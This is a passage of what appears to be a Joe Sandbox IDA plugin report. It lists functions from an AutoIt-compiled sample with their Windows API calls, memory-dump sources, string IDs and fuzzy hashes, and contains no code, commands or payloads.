                                                                                                                                                                        • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 002C146F
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Message
                                                                                                                                                                        • String ID: AutoIt$Error allocating memory.
                                                                                                                                                                        • API String ID: 2030045667-4017498283
                                                                                                                                                                        • Opcode ID: 7ce933a85640607a74390761eb9d54d06a45cc8f56ea55a92459ef966954d4dc
                                                                                                                                                                        • Instruction ID: c602cc4a02b96b7a75fbf40b9ca58594744245099f9a366b374968abb04256f3
                                                                                                                                                                        • Opcode Fuzzy Hash: 7ce933a85640607a74390761eb9d54d06a45cc8f56ea55a92459ef966954d4dc
                                                                                                                                                                        • Instruction Fuzzy Hash: 93E0D8322A532836D6243794BC47F98B6858F05BA1F11442AF78C544C38EE224B05799
                                                                                                                                                                        Function 002810B3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 0027FAD4: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,002810E2,?,?,?,0026100A), ref: 0027FAD9
                                                                                                                                                                        • IsDebuggerPresent.KERNEL32(?,?,?,0026100A), ref: 002810E6
                                                                                                                                                                        • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0026100A), ref: 002810F5
                                                                                                                                                                        Strings
                                                                                                                                                                        • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 002810F0
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                                                                                                                        • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                                                        • API String ID: 55579361-631824599
                                                                                                                                                                        • Opcode ID: 8511b68664941cadbf81373764bfc90ec1664573579cc90aa9ad514466f2bce1
                                                                                                                                                                        • Instruction ID: f253db15ddd9e00700c81d80afa6453b2788d69f19ce2dae1b1217a1d774c0c4
                                                                                                                                                                        • Opcode Fuzzy Hash: 8511b68664941cadbf81373764bfc90ec1664573579cc90aa9ad514466f2bce1
                                                                                                                                                                        • Instruction Fuzzy Hash: E4E092746157518BD371AF24E948743BBE8AF00350F008D6CE88AD26D2DBB4E494CF91
                                                                                                                                                                        Function 0027F114 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 0027F151
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Init_thread_footer
                                                                                                                                                                        • String ID: `53$h53
                                                                                                                                                                        • API String ID: 1385522511-3499738754
                                                                                                                                                                        • Opcode ID: 55ae8ad7d47897d629290f33076148816f06d40137751172bc0a49183e9c5187
                                                                                                                                                                        • Instruction ID: f963d94fc6e4043359e7de2cdc3027d1d86fb9fa460be5b76feae347c3a6131c
                                                                                                                                                                        • Opcode Fuzzy Hash: 55ae8ad7d47897d629290f33076148816f06d40137751172bc0a49183e9c5187
                                                                                                                                                                        • Instruction Fuzzy Hash: F9E0203A5B8414CBD542E71CD9C19843354FB06320FD0C174E11D472D1D7381B52CF14
                                                                                                                                                                        Function 002D39D8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 002D39F0
                                                                                                                                                                        • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 002D3A05
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Temp$FileNamePath
                                                                                                                                                                        • String ID: aut
                                                                                                                                                                        • API String ID: 3285503233-3010740371
                                                                                                                                                                        • Opcode ID: fd37779a60a3c77e8e02f478a4de21f76d6e6bc329b8dd3bfe42c7f29ca1f748
                                                                                                                                                                        • Instruction ID: f95e4e48d3933ceedb326b32469a7be1e5cae8850e3e5eb173f2448850d6910e
                                                                                                                                                                        • Opcode Fuzzy Hash: fd37779a60a3c77e8e02f478a4de21f76d6e6bc329b8dd3bfe42c7f29ca1f748
                                                                                                                                                                        • Instruction Fuzzy Hash: 0AD05E7250032867DB20A764AD0EFDB7A6CDB45760F0002A1BE5592092DAB0EA85CBD0
                                                                                                                                                                        Function 002F2DBE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 002F2DC8
                                                                                                                                                                        • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 002F2DDB
                                                                                                                                                                          • Part of subcall function 002CF292: Sleep.KERNEL32 ref: 002CF30A
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FindMessagePostSleepWindow
                                                                                                                                                                        • String ID: Shell_TrayWnd
                                                                                                                                                                        • API String ID: 529655941-2988720461
                                                                                                                                                                        • Opcode ID: d5d5f2c4f51dc917a52ea56728ef2fceeba386c92b3282a9a98256123a37ace7
                                                                                                                                                                        • Instruction ID: cc19abfbfaa248bfdb057e479cf1bde59e6b902f634cc981af33e96a03405ee0
                                                                                                                                                                        • Opcode Fuzzy Hash: d5d5f2c4f51dc917a52ea56728ef2fceeba386c92b3282a9a98256123a37ace7
                                                                                                                                                                        • Instruction Fuzzy Hash: 02D01235395310B7E668B770BD5FFF67B55AF50B60F504835B749AA1D0C9E06800CA54
                                                                                                                                                                        Function 002F2DF2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 002F2E08
                                                                                                                                                                        • PostMessageW.USER32(00000000), ref: 002F2E0F
                                                                                                                                                                          • Part of subcall function 002CF292: Sleep.KERNEL32 ref: 002CF30A
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FindMessagePostSleepWindow
                                                                                                                                                                        • String ID: Shell_TrayWnd
                                                                                                                                                                        • API String ID: 529655941-2988720461
                                                                                                                                                                        • Opcode ID: 89ca58fdeb8293e20b64b42106fe1752bd74205f5f1f24cd0fa4f917aa5fb49b
                                                                                                                                                                        • Instruction ID: 15532845c81fc2e0e85a20ee94897cbc13f3b78d64cf40a5563417e282f0ff51
                                                                                                                                                                        • Opcode Fuzzy Hash: 89ca58fdeb8293e20b64b42106fe1752bd74205f5f1f24cd0fa4f917aa5fb49b
                                                                                                                                                                        • Instruction Fuzzy Hash: DCD022313C13107BF268B330BC0FFE23B15AB00B60F500834B705EA0C0C8E06800CA44
                                                                                                                                                                        Function 0029C17D Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 0029C213
                                                                                                                                                                        • GetLastError.KERNEL32 ref: 0029C221
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0029C27C
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1717984340-0
                                                                                                                                                                        • Opcode ID: eda3466e6a75bceb6869c0af6f07f0fb40a44f9cb5a80d26bd7e8e6a514d48e2
                                                                                                                                                                        • Instruction ID: db2138d618dd80f7946f5123d8aa1d6bb7172bcde13fde3848818c5ba021417b
                                                                                                                                                                        • Opcode Fuzzy Hash: eda3466e6a75bceb6869c0af6f07f0fb40a44f9cb5a80d26bd7e8e6a514d48e2
                                                                                                                                                                        • Instruction Fuzzy Hash: 1241C830A20616EFDF259FE5C844BBA7BA9AF51720F34416AFC59971A1DB308D21CB60